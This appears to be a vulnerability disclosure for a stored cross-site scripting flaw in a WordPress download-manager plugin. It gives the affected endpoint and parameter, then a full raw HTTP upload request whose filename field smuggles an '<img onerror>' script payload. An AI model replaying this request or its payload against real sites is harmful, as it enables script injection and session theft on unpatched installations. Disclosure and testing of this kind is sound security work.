The plugin does not properly validate and sanitise the uploaded filename, which could result in a Cross-Site Scripting issue.
Vulnerable page - 'cmdownload/add/'
Vulnerable parameter - 'filename' in 'Content-Disposition' Header
POST /cmdownload/add/ HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------297219106631036445401265881685
Content-Length: 1147
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/cmdownload/add/
Cookie: comment_author_8dec71ede39ad9ff3b3fbc03311bdc45=eee; comment_author_email_8dec71ede39ad9ff3b3fbc03311bdc45=eee%40mail.ru; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_8dec71ede39ad9ff3b3fbc03311bdc45=test%7C1595793663%7C2B6NRI0OfyfJBfpulgmlcilvU96g754sgpLJh8GeNdA%7Ccf65a0a17f07e0e3180504eed05869ab0aa68af496aba7d26aa1848edf97fbea; wp-settings-time-1=1595621338; PHPSESSID=153061963252781ff3b221c0305d536e; wp-settings-1=editor%3Dtinymce
Upgrade-Insecure-Requests: 1
-----------------------------297219106631036445401265881685
Content-Disposition: form-data; name="CMDM_AddDownloadForm_title"
test name
-----------------------------297219106631036445401265881685
Content-Disposition: form-data; name="CMDM_AddDownloadForm_package"; filename="users.doc<img src=a onerror=alert('XSS')>"
Content-Type: application/msword
some test data
-----------------------------297219106631036445401265881685
Content-Disposition: form-data; name="CMDM_AddDownloadForm_categories[]"
17
-----------------------------297219106631036445401265881685
Content-Disposition: form-data; name="CMDM_AddDownloadForm_description"
222
-----------------------------297219106631036445401265881685
Content-Disposition: form-data; name="CMDM_AddDownloadForm_screenshots"
[]
-----------------------------297219106631036445401265881685
Content-Disposition: form-data; name="CMDM_AddDownloadForm_screenshots-caches"
[]
-----------------------------297219106631036445401265881685
Content-Disposition: form-data; name="CMDM_AddDownloadForm_submit"
Add
-----------------------------297219106631036445401265881685--